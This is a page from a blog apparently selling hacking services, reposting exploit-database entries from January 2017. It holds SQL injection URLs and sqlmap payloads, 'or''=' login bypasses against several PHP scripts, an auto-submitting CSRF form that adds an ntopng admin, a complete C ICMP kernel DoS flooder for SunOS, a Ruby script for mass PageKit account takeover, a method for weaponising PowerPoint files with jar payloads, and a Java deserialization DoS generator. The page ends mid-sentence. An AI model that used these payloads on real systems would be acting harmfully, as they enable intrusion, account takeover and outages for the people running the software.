Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863293313

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Vine VideoSite Creator Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-vinezone-vine-videosite-creator-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c.... 
# # # # #
HireHackking 
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Job Vacancy Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-job-bank-job-vacancy-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c.... 
# # # # #
HireHackking 
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Home of Viral Images, Videos and Articles Script
# Script Buy Now: http://www.scriptfolder.com/viralzone-home-of-viral-images-videos-and-articles/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c.... 
# # # # #
HireHackking 
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: VideoZone - Video Site Creator Script 
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-videozone-video-site-creator/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c.... 
# # # # #
HireHackking 
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Classifieds Script 
# Script Buy Now:http://www.scriptfolder.com/scriptfolder-classifieds/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c.... 
# # # # #
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=967

The TSP touchscreen controller driver exposes several sysfs entries through which the driver may be configured. One such entry, "cmd", allows the user to write commands to be executed by the driver.

Specifically, the "cmd" entry is writable, and is present under:

/sys/devices/virtual/sec/tsp/cmd

Writes to this sysfs entry are handled by the function "cmd_store", under drivers/input/touchscreen/sec_ts/sec_ts_fn.c

This function fails to validate the length of the supplied buffer, before copying data from it into two memory locations. First, the data is copied into a static structure:

    ...
    memset(ts->cmd, 0x00, sizeof(ts->cmd));
    memcpy(ts->cmd, buf, length);
    memset(ts->cmd_param, 0, sizeof(ts->cmd_param));
    memset(buffer, 0x00, sizeof(buffer));
    ...

The "buf" argument contains the user-supplied data, and the "length" argument is completely user-controlled. Since the length of ts->cmd is defined to be CMD_STR_LEN (256), this memcpy will overflow into adjacent fields in the "ts" structure, allowing the attack to replace these with attack-controlled data.

Second, the user-supplied data is copied into a local stack-allocated buffer, like so:

    ...
    char buffer[CMD_STR_LEN];
    ...
    pos = strchr(buf, (int)delim);
    if (pos)
        memcpy(buffer, buf, pos - buf);
    else
        memcpy(buffer, buf, length);
    ...


This means that the attacker can also overwrite the data on the stack, including the value of frame pointer and return address, simply by providing a buffer of length >CMD_STR_LEN. This allows the attacker to directly hijack the control flow when the function returns.

I've statically and dynamically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource", the device's build is "XXS1APG3".

The sysfs entries mentioned above have UID "system" and GID "radio". The SELinux context for these entries is: "u:object_r:sysfs_sec:s0".

According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:

   allow shell sysfs_sec : file { read open } ; 
   allow system_app sysfs_sec : file { ioctl read write getattr lock append open } ; 
   allow rild sysfs_sec : file { ioctl read write getattr lock append open } ; 
   allow system_app sysfs_sec : dir { ioctl read write getattr add_name remove_name search open } ; 
   allow diagexe sysfs_sec : file { ioctl read write getattr lock append open } ; 
   allow at_distributor sysfs_sec : file { ioctl read write getattr setattr lock append open } ; 


Proof of concept for the buffer overflow in the TSP driver.

Includes a short ROP chain which allows execution of any arbitrary function in the context of the linux kernel, with arbitrary arguments. This PoC also uses the KASLR bypass in "pm_qos" to adjust for the KASLR slide).

The high-level flow for executing a function in the kernel is the following:
  -Allocate a (user-space) buffer on the heap with a dummy "marker" value
  -Start a new thread (denote it "Thread B", denote the original thread "Thread A")
  -Thread A:
    -Perform a busy loop waiting for the dummy value to be updated
  -Thread B:
    -Create a ROP chain which does the following:
      -Prepares arguments for a function call
      -Calls the wanted function in the context of the kernel
      -Stores X0 in a sysfs entry in the kernel VAS (e.g., uevent_seqnum)
      -Change the dummy value shared from thread A to indicate completion
      -Enter idle loop
  -Thread A:
    -(Exit busy loop as the marker value has been modified)
    -Read the result of the execution by reading the sysfs entry


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41130.zip
HireHackking 
# Title : Complain Management System SQL Injection
# Date: 20 January 2017
# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
# Tested on: Windows7 x32
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
 
#################################################

## About The Product : ##
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability : ## 
The functions.php file line 88 has hardcoded admin credentials.
		elseif($uType == 'admin'){
			//$_SESSION['user_id'] = $row['sid'];
			if($userName == 'admin' && $password == 'admin123'){
				$_SESSION['user_id'] = 0;
				$_SESSION['user_name'] = 'Administrator';
				$_SESSION['user_type'] = 'admin';
				header('Location: '.WEB_ROOT.'index.php');
				exit;

Using the hardcoded admin credentials we then have access to the process.php file that is vulnerable to SQL injection.

-HTTP Method : GET

- Sqlmap command: sqlmap -u "http://192.168.19.135/cms/process.php?action=deleteCust&cId=123" --cookie="PHPSESSID=q446r5fqav1qlljb7cohd29r85"

- Sqlmap Output : 
sqlmap identified the following injection point(s) with a total of 622 HTTP(s) requests:
---
Parameter: cId (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: action=deleteCust&cId=123 RLIKE (SELECT (CASE WHEN (8336=8336) THEN 123 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: action=deleteCust&cId=123 AND EXTRACTVALUE(8194,CONCAT(0x5c,0x7171706a71,(SELECT (ELT(8194=8194,1))),0x716a6b6271))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=deleteCust&cId=123 AND (SELECT * FROM (SELECT(SLEEP(5)))fdmM)
---
[22:54:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >= 5.1
HireHackking 
# # # # # 
# Exploit Title: ICGames-Games Site Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/games-site-script.htm
# Demo: http://www.icloudcenter.net/demos/icgames/
# Version: 1.2
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: ICDomains-Domains Marketplace Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/domains-marketplace-script.htm
# Demo: http://icloudcenter.net/demos/icdomains/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: ICTutors-Tutoring Site Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/tutoring-site-script.htm
# Demo: http://www.icloudcenter.net/demos/ictutors/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: IC-Mini Blog Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/mini_blog.htm
# Demo: http://www.icloudcenter.net/demos/mini_blog/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/index.php?admin=login and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: ICJobSite-Job Site PHP Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/jobs-site-script.htm
# Demo: http://icloudcenter.net/demos/icjobsite/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/index.php?admin=login and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: ICMusic - Music Site Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/music-site-script.htm
# Demo: http://icloudcenter.net/demos/icmusic/
# Version: 1.2
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: ICAffiliateTracking - Affiliate Tracking Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/affiliates-tracking-script.htm
# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
# Version: 1.2
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/adminlogin.asp and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: IC-Mini CMS Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/mini_cms.htm
# Demo: http://www.icloudcenter.net/demos/mini_cms/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]//index.php?page=login and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: B2B Alibaba Clone Script - SQL Injection
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: https://www.clonescriptsoft.com/
# Software Buy: https://www.clonescriptsoft.com/collections/b2b-alibaba-clone/products/alibaba-clone
# Demo: http://alibaba.clonescriptsoft.com/
# Version: N/A
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/category.php?IndustryID=[SQL]
# E.t.c....
# # # # #


SQL Injection
http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version()

http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--
HireHackking 
[+]#####################################################################################
[+] Credits / Discovery: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
[+] ISR: ApparitionSEC
[+]#####################################################################################



Vendor:
============
www.ntop.org


Product:
====================
ntopng Web Interface
v2.4.160627

ntopng is the next generation version of the original ntop, a network
traffic probe that shows the network usage, similar
to what the popular top Unix command does. ntopng is based on libpcap and
it has been written in a portable way in order to
virtually run on every Unix platform, MacOSX and on Windows as well.


Vulnerability Type:
==================
CSRF Token Bypass



CVE Reference:
================
CVE-2017-5473



Security Issue:
=================
By simply omitting the CSRF token or supplying arbitrary token values will
bypass CSRF protection when making HTTP requests,
to the ntopng web interface. Allowing remote attackers the rights to make
HTTP requests on an authenticated users behalf, if
the user clicks an malicious link or visits an attacker webpage etc.


Exploit/POC:
============

1) Change admin password
http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED&username=admin&new_password=xyz123&confirm_new_password=xyz123


2) Add arbitrary

<form action="
http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED"
method="GET">
<input type="hidden" name="username"  value="hyp3rlinx">
<input type="hidden" name="full_name"  value="TheApparitioN">
<input type="hidden" name="password"  value="abc123">
<input type="hidden" name="confirm_password"  value="abc123">
<input type="hidden" name="host_role"  value="administrator">
<input type="hidden" name="allowed_networks"  value="0.0.0.0/,::/">
<input type="hidden" name="allowed_interface"  value="HTTP/1.1">
<script>document.forms[0].submit()</script>
</form>



Disclosure Timeline:
=====================
Vendor Notification: January 11, 2017
Vendor acknowledgement: January 12, 2017
Vendor Fixed Issue
January 20, 2017 : Public Disclosure



Network Access:
===============
Remote


Impact:
======================
Information Disclosure
Privilege Escalation



Severity:
===========
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.  All content (c) HYP3RLINX -
Apparition
HireHackking 
/*
*  SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit
*
*  Todor Donev <todor.donev@gmail.com>
*  http://www.ethical-hacker.org/
*  https://www.facebook.com/ethicalhackerorg
*
*  Disclaimer:
*  This or previous programs is for Educational
*  purpose ONLY. Do not use it without permission.
*  The usual disclaimer applies, especially the
*  fact that Todor Donev is not liable for any
*  damages caused by direct or indirect use of the
*  information or functionality provided by these
*  programs. The author or any Internet provider
*  bears NO responsibility for content or misuse
*  of these programs or any derivatives thereof.
*  By using these programs you accept the fact
*  that any damage (dataloss, system crash,
*  system compromise, etc.) caused by the use
*  of these programs is not Todor Donev's
*  responsibility.
*
*  Use them at your own risk!
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
=20
unsigned char b00m[75] =3D
{
    0x45, 0xFF, 0x00, 0x4D, 0x0C,
    0x52, 0x00, 0x00, 0x7E, 0x01,
    0x0C, 0xF2, 0x85, 0x47, 0x21,
    0x07, 0xC0, 0xA8, 0x0E, 0x58,
    0x03, 0x01, 0xAE, 0x37, 0x6F,
    0x3B, 0x66, 0xA7, 0x60, 0xAA,
    0x76, 0xC1, 0xEC, 0xA7, 0x7D,
    0xFA, 0x8A, 0x72, 0x8E, 0xC6,
    0xE3, 0xD2, 0x64, 0x13, 0xE7,
    0x4D, 0xBC, 0x01, 0x40, 0x5B,
    0x8E, 0x8B, 0xE5, 0xEE, 0x5E,
    0x37, 0xDD, 0xC2, 0x54, 0x8E,
    0x8D, 0xCE, 0x0C, 0x42, 0x97,
    0xA1, 0x8C, 0x04, 0x8A, 0xC2,=20
    0x6B, 0xAE, 0xE9, 0x2E, 0xFE,
} ;
=20
    long   resolve(char *target){
    struct hostent *tgt;
    long   addr;
=20
    tgt =3D gethostbyname(target);
if (tgt =3D=3D NULL)
  return(-1);
    memcpy(&addr,tgt->h_addr,tgt->h_length);
    memcpy(b00m+16,&addr,sizeof(long));
  return(addr);
}
int main(int argc, char *argv[]){
    struct  sockaddr_in dst;
    long    saddr, daddr;
    int     s0cket;
    printf("[ SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit\n");
    printf("[ Todor Donev <todor.donev@gmail.com> www.ethical-hacker.org\n"=
);
  if (argc < 2){
    printf("[ Usage: %s <target>\n", *argv);
    return(1);
  }
  daddr   =3D resolve(argv[1]);
  saddr   =3D INADDR_ANY;
  memcpy(b00m+16, &daddr, sizeof(long));
  dst.sin_addr.s_addr   =3D daddr;
  dst.sin_family        =3D AF_INET;
  s0cket                =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s0cket =3D=3D -1)
    return(1);
    printf("[ ICMP Attacking: %s\n", argv[1]);
  while(1){
    if (sendto(s0cket,&b00m,75,0,(struct sockaddr *)&dst,sizeof(struct sock=
addr_in)) =3D=3D -1){
         perror("[ Error");
         exit(-1);
    }
  }
}
HireHackking 
# Exploit Title: Remote PageKit Password Reset Vulnerability
# Date:21-01-2017
# Software Link: http://pagekit.com/
# Exploit Author: Saurabh Banawar from SecureLayer7

# Contact: http://twitter.com/securelayer7
# Website: https://securelayer7.net
# Category: webapps

1. Description

Anyremote user can reset the password by reading the debug log, the exploit
can be successfully executed, if the debug option is enabled in the Pagekit
CMS.

CMS Pentest report can be found here:https://securelayer7.net/
download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf


2. Proof of Concept

require 'net/http'

#Enter the domain/IP address of the site for which you want to test this vulnerability
vulnerableSite = 'http://127.0.0.1'

loopCount = 0
while loopCount == 0


#We request the Login page which has the debug parameter
url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login')
request = Net::HTTP::Get.new(url.to_s)
resp = Net::HTTP.start(url.host, url.port) {|http|
http.request(request)
}

#The response is received and is sent to many regular expression to find the value of _debug parameter from its HTML source code
bodyOfResponse =  resp.body
myArray1 = bodyOfResponse.split(/"current":"/)
outputOfMyArray1 = myArray1[1]
myArray2 = outputOfMyArray1.split(/"};/)
theSecret = myArray2[0]
puts ""
puts "The secret token to debug link is: #{theSecret}"
puts ""
url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret)
request = Net::HTTP::Get.new(url.to_s)
resp = Net::HTTP.start(url.host, url.port) {|http|
http.request(request)
}

resp.body

initial = resp.body

#The count of number of victim users is found out
 users = initial.scan(/user=.+?(?=")/)
 c =  users.count
 e = c.to_i
 
#If the count is 0 then we continuosly monitor it
 if c == 0 then puts "Currently no user has clicked on reset password like."
 
 puts ""
 puts "Trying again..."
 puts ""
 puts ""
 
#If the count is greater than 0 then it means we found a victim. So, find the password reset link and display it in the console
 else
 
 link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user="
 link2 = "&key="
 i = 0
  while i<e
	securityToken = ''
    a = real[i]
	b = a.split('=')
	c = b[1]
	d = c.split('\\')
	victimUserName = d[0]
	puts "The victim is: #{victimUserName}"
	f = b[2]
	securityToken = f.scan(/[^\\]/)
	securityTokenFiltered = securityToken.join
	puts "The security token of victim is: #{securityTokenFiltered}"
	puts "Link for account takeover"
	puts "#{link1}#{victimUserName}#{link2}#{securityTokenFiltered}"
	puts ""
	puts ""
	i += 1
 end
 
 
 end
 
 # This loop runs forever because we want to continuosly monitor who is requesting a password reset and who has clicked on the link so that
 # we can perform mass account takeovers
 end
 
 

3. Solution:

Update to version 1.0.11
https://github.com/pagekit/pagekit/releases/tag/1.0.11
HireHackking 
# Exploit Title: Microsoft Power Point Java Payload Code Execution
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Demo Video : https://www.youtube.com/watch?v=DOJSUJK7hRo
# Video Tutorial : https://www.youtube.com/watch?v=Li_h-iuXgEM
# Youtube Channel: https://www.youtube.com/user/cutehack3r
# Date: Jan 21, 2017
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://www.office.com/
# Version: Windows 7 x64 Ultimate Build 7601 Service Pack 1 Without any updates
# Tested on: Windows 7 x64 Ultimate Build 7601 SP1 Without any updates, Power Point 2016 MSO 16.0.4266.1001 64-bit professional plus and Java Version 8 Update 101 (build 1.8.0_101-b13).

Microsoft power point allows users to insert objects of arbitrary file types, at presentation time these objects can be activated by mouse movement or clicking.

If the user have JAVA (or python or similar interpreters) an attacker can insert jar file or py file into the presentation and trigger it when mouse moves, for easier exploitation the attacker can use ppsx file which will load automatically in presentation mode and once the user opens the file and moves mouse it will trigger the payload.

To exploit this issue:

1 - Create a new power point presentation.
2 - Insert object and choose "create from file" and choose the jar payload.
3 - On the insert tab, click action and in both "mouse over" and "mouse click" tabs choose "object action" and choose "activate"
4 - Scale the object to fit the whole slide so when the user opens the file it mouse will be over it, and just in case also if the user clicks it will open the jar file.
5 - Save the file as ppsx file.

POC file that will open a java pop up when executed but any java payload will also work including the meterpreter payloads generated by metasploit.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41144.ppsx

Please note that in a fully patched version a pop up will show asking the user to run the file which is useful if you're good at social engineering ;)

Timeline:
Aug 10, 2016 - Reported To Microsoft
Sep 7, 2016 - Microsoft Said they're unable to have the same behaviour and asked me to update My system and check again.
Sep 8, 2016 - sent to Microsoft to confirm that a pop up shows in case of a fully updated windows 7 version.
Sep 17, 2016 - Microsoft asked for a video showing the bug in both updated and not updated versions, I sent the video in the same day.
Sep 27, 2016 - Microsoft confirmed that the behavior can only produced in a non patched version and considered as not reproducible.
HireHackking 
'''
Application: Java SE

Vendor: Oracle

Bug: DoS

Reported: 23.12.2016

Vendor response: 24.12.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Author: Roman Shalymov



1. ADVISORY INFORMATION

Title: Oracle OpenJDK - Java Serialization DoS

Advisory ID: [ERPSCAN-17-006]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle


2. VULNERABILITY INFORMATION


Class: Denial of Service

Remotely Exploitable: Yes

Locally Exploitable: Yes

CVE Name: CVE-2017-3241

CVSS Base Score: 9.0


3. VULNERABILITY DESCRIPTION


An attacker can cause DoS of the application which uses OpenJDK Runtime
Environment 1.8 as its core runtime engine.


4. VULNERABLE PACKAGES


OpenJDK Runtime Environment build 1.8.0_112-b15


5. SOLUTIONS AND WORKAROUNDS


Fix ObjectInputStream.skipCustomData() method, namely readObject0(false);
call in switch statement

Adress Oracle CPU January 2017

 6. AUTHOR


Roman Shalymov (@shalymov)


7. TECHNICAL DESCRIPTION


An attacker can craft a malicious sequence of bytes that will cause JVM
StackOverflowError in the standard Java deserialization process if it uses
ObjectInputStream.readObject() method.


7.1. Proof of Concept

An attacker creates a malicious sequence of bytes, for example, using this
python script pwn_ser.py:

'''
#!/usr/bin/env python2

import sys

exp = ""

#serialization header

exp += '\xac\xed\x00\x05'

exp1 = ''

exp1 += '\x72'

exp1 += '\x00\x0c'+'java.io.File'

exp1 += '\x41'*8

exp1 += '\x00'

exp1 += '\x00\x00'


exp += exp1 * 10000

sys.stdout.write(exp)

'''
and save it in exp2.ser file


$ ./pwn_ser2.py > exp2.ser

Let's simulate deserialization process. For this purpose, we create a
simple Java program, which uses the following standard deserialization
pattern:


Serialize_read.java


import java.io.FileInputStream;

import java.io.ObjectInputStream;

public class Serialize_read {

public static void main(String args[]) throws Exception {

  if(args.length < 1) {

      System.out.println("usage: "+Serialize_read.class.getSimpleName()+"
[file]");

      System.exit(-1);

  }

  FileInputStream fin = new FileInputStream(args[0]);

  ObjectInputStream oin = new ObjectInputStream(fin);

  try {

    Object objFromDisk = oin.readObject();

    String s = (String)objFromDisk;

    System.out.println(s);

    System.out.println("Successfully read!");

  }catch(Exception e){}

  System.exit(0);

}

}


Let's try to read our malicious file (we can also simulate this stuff over
network communication):

$ javac Serialize_read.java

$ java Serialize_read exp2.ser

It causes the following error dump:

Exception in thread "main" java.lang.StackOverflowError

at
java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)

at
java.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)

at
java.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)

at java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)

at java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)

at java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)

...

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)


8. REPORT TIMELINE

Reported: 23.12.2016

Vendor response: 24.12.2016

Date of Public Advisory: 17.01.2017

9. REFERENCES
http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/


10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and analysis of
critical enterprise applications. It was acknowledged multiple times by the
largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for
discovering more than 400 vulnerabilities in their solutions (200 of them
just in SAP!).

ERPScan researchers are proud of discovering new types of vulnerabilities
(TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug"
nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at 60+
prime international security conferences in 25+ countries across the
continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for
several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP security
researches.

ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters, Yahoo, SC
Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in various
fields of cybersecurity (from web application to ICS/SCADA systems),
gathering their experience to conduct the best SAP security research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally and
enables large Oil and Gas, Financial, Retail and other organizations to
secure their mission-critical processes. Named as an aEmerging Vendora in
Security by CRN, listed among aTOP 100 SAP Solution providersa and
distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in
discovering and resolving security vulnerabilities. ERPScan consultants
work with SAP SE in Walldorf to assist in improving the security of their
latest solutions.

ERPScanas primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and secure
SAP and Oracle ERP systems and business-critical applications from both
cyberattacks and internal fraud. As a rule, our clients are large
enterprises, Fortune 2000 companies and MSPs, whose requirements are to
actively monitor and manage security of vast SAP and Oracle landscapes on a
global scale.

We afollow the suna and have two hubs, located in Palo Alto and Amsterdam,
to provide threat intelligence services, continuous support and to operate
